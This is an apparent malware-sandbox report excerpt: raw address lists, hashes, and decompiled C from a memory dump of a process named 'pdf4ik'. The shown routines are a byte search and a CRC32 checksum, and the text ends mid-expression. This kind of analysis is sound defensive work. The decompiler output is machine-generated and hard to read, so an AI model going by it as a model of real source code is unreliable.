                                        0x00000000
                                        0x29dba18f
                                        0x29dba179
                                        0x29dba179
                                        0x29dba17f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba17f
                                        0x29dba15a
                                        0x29dba15a
                                        0x29dba160
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba160
                                        0x29dba13b
                                        0x29dba13b
                                        0x29dba141
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba0b2
                                        0x29dba0b2
                                        0x29dba0b5
                                        0x29dba0b9
                                        0x29dba0bb
                                        0x29dba0cc
                                        0x29dba0cc
                                        0x29dba0d0
                                        0x29dba0d4
                                        0x29dba0d6
                                        0x29dba0e7
                                        0x29dba0e7
                                        0x29dba0eb
                                        0x29dba0ef
                                        0x29dba0f1
                                        0x29dba102
                                        0x29dba102
                                        0x29dba106
                                        0x29dba10a
                                        0x29dba10c
                                        0x29dba10e
                                        0x29dba115
                                        0x29dba115
                                        0x29dba115
                                        0x00000000
                                        0x29dba10c
                                        0x29dba0f3
                                        0x29dba0f7
                                        0x29dba0fa
                                        0x29dba0fa
                                        0x29dba100
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba100
                                        0x29dba0d8
                                        0x29dba0dc
                                        0x29dba0df
                                        0x29dba0df
                                        0x29dba0e5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba0e5
                                        0x29dba0bd
                                        0x29dba0c1
                                        0x29dba0c4
                                        0x29dba0c4
                                        0x29dba0ca
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba0ca
                                        0x29dba0a3
                                        0x29dba0a3
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                        • Instruction ID: e6ada4b40e1c0bce8beed0674b09a2bc32d63f20e2b0bfcfc70b6f3005c98275
                                        • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                        • Instruction Fuzzy Hash: FEB1B373D1E5B3058779456D452822FFFE26EC1A8031BC399CCD53FA89C627AE02A5D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DAEB70(signed int _a4, signed char _a8, intOrPtr _a12) {
                                        				intOrPtr _t13;
                                        				void* _t14;
                                        				signed char _t20;
                                        				signed char _t24;
                                        				signed int _t27;
                                        				signed char _t32;
                                        				unsigned int _t33;
                                        				signed char _t35;
                                        				signed char _t37;
                                        				signed int _t39;
                                        
                                        				_t13 = _a12;
                                        				if(_t13 == 0) {
                                        					L11:
                                        					return _t13;
                                        				} else {
                                        					_t39 = _a4;
                                        					_t20 = _a8;
                                        					if((_t39 & 0x00000003) == 0) {
                                        						L5:
                                        						_t14 = _t13 - 4;
                                        						if(_t14 < 0) {
                                        							L8:
                                        							_t13 = _t14 + 4;
                                        							if(_t13 == 0) {
                                        								goto L11;
                                        							} else {
                                        								while(1) {
                                        									_t24 =  *_t39;
                                        									_t39 = _t39 + 1;
                                        									if((_t24 ^ _t20) == 0) {
                                        										goto L20;
                                        									}
                                        									_t13 = _t13 - 1;
                                        									if(_t13 != 0) {
                                        										continue;
                                        									} else {
                                        										goto L11;
                                        									}
                                        									goto L24;
                                        								}
                                        								goto L20;
                                        							}
                                        						} else {
                                        							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
                                        							do {
                                        								_t27 =  *_t39 ^ _t20;
                                        								_t39 = _t39 + 4;
                                        								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
                                        									goto L12;
                                        								} else {
                                        									_t32 =  *(_t39 - 4) ^ _t20;
                                        									if(_t32 == 0) {
                                        										return _t39 - 4;
                                        									} else {
                                        										_t33 = _t32 ^ _t20;
                                        										if(_t33 == 0) {
                                        											return _t39 - 3;
                                        										} else {
                                        											_t35 = _t33 >> 0x00000010 ^ _t20;
                                        											if(_t35 == 0) {
                                        												return _t39 - 2;
                                        											} else {
                                        												if((_t35 ^ _t20) == 0) {
                                        													goto L20;
                                        												} else {
                                        													goto L12;
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        								goto L24;
                                        								L12:
                                        								_t14 = _t14 - 4;
                                        							} while (_t14 >= 0);
                                        							goto L8;
                                        						}
                                        					} else {
                                        						while(1) {
                                        							_t37 =  *_t39;
                                        							_t39 = _t39 + 1;
                                        							if((_t37 ^ _t20) == 0) {
                                        								break;
                                        							}
                                        							_t13 = _t13 - 1;
                                        							if(_t13 == 0) {
                                        								goto L11;
                                        							} else {
                                        								if((_t39 & 0x00000003) != 0) {
                                        									continue;
                                        								} else {
                                        									goto L5;
                                        								}
                                        							}
                                        							goto L24;
                                        						}
                                        						L20:
                                        						return _t39 - 1;
                                        					}
                                        				}
                                        				L24:
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: fe9f420bc8642f5c327d5b1f78aedbccb715b0cca451067e2cddbf97e5d46e78
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: 99112E7720418183D60C8A3EC4FC5ABA3D5EFC9221B69477ED2C34BE58D2269177F520
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DABA00(signed char* __ecx, unsigned int __edx) {
                                        				signed int _t26;
                                        				signed int _t27;
                                        				signed char* _t46;
                                        				unsigned int _t47;
                                        				unsigned int _t80;
                                        
                                        				_t47 = __edx;
                                        				_t46 = __ecx;
                                        				if(__ecx != 0) {
                                        					_t27 =  !_t26;
                                        					if(__edx >= 8) {
                                        						_t80 = __edx >> 3;
                                        						do {
                                        							_t27 = (((((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ 
((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 
0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[6] & 0x000000ff ^ (((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  
*(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( 
*_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 
^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[7] & 0x000000ff ^ ((((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 
0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  
*(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ 